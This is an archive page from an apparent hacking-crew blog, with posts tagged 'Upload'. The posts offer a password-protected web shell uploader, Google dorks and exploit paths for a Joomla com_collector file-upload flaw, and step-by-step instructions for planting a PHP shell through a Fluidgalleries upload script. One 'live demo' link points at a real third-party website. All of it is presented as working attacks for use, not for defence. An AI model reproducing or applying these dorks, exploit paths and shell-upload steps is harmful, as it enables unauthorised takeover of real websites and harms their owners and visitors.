Affichage des articles dont le libellé est Upload. Afficher tous les articles
Affichage des articles dont le libellé est Upload. Afficher tous les articles

[RELEASE] 406 Not Acceptable! Private Uploader


Your shell always got stolen? Someone may have access to your uploader? Don't worry, we got the solution!

This uploadr was recoded from ordinary uploader by K3RAMA7. To login into the uploader, simply move your mouse to the center and enter the password.

Default Password
Black CyberSec Crew
Once logged in Successfully

Downloads
http://pastebin.com/bct6SjaM

~ samedi 6 décembre 2014 0 commentaires

Joomla Collector Shell Uploader

Dork:
inurl:index.php?option=com_collector

Exploit:
 /index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1

Live Demo:
http://www.volontarimini.it/volontarimini2012/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1

 NEXUS - Sharing Is Caring

~ dimanche 6 juillet 2014 0 commentaires

Joomla - com_joomla_flash_uploader Remote File Upload


~ mercredi 2 juillet 2014 0 commentaires

Fluidgalleries Photo Upload Remote - File Upload Vulnerability

Dorks:
inurl:"fluidgalleries/dat/info.dat"
 inurl:"/fluidgalleries/php/"
Exploit:
http://localhost/[path]/fluidgalleries/php/photo-upload.php
*Use Firefox...

Use Live HTTP Headers... Then go to here:
http://localhost/[path]/fluidgalleries/php/photo-upload.php

1.Click the Choose File button Then select a file [shell.php.jpg] 

2.Then click on the upload button.

3. Now using Live HTTP Headers uploaded files to PHP change [shell.php]

4. Then go to this page :
http://localhost/[path]/fluidgalleries/photos/ [Random number+shell.php]

Example: 1NEXUS.php

.. Video proof exploits :
http://m-h-a-c-k-e-r.persiangig.com/Black.Idc-Team/fluidgalleriesExploit/fluidgalleriesExploit.swf


~ lundi 30 juin 2014 0 commentaires